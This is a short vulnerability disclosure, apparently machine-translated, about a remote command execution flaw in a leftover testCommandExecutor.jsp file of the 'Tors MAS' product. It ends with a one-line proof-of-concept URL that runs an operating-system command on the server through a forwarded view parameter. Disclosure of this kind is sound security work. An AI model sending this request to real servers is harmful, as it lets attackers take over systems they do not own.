Tols Mas Testcommandexecutor Jsp Remote Command Execution Vulnerability
Tols Mas Testcommandexecutor Jsp Remote Command Execution Vulnerability
#Tors MAS testCommandExecutor.jsp Remote Command Execution Vulnerability
Vulnerability Description
The MAS testCommandExecutor.jsp test file has a remote command execution vulnerability. When the website operator does not delete the test file, the attacker can obtain server permissions through the vulnerability.
Vulnerability Impact
Tors-MAS
Network surveying and mapping
Vulnerability reappears
Main page
Verify POC
1
/mas/front/vod/main.do?method=newList&view=forward:/sysinfo/testCommandExecutor.jsp&cmdLine=dir&workDir=&pathEnv=&libPathEnv=
This post is licensed under CC BY 4.0 by the author.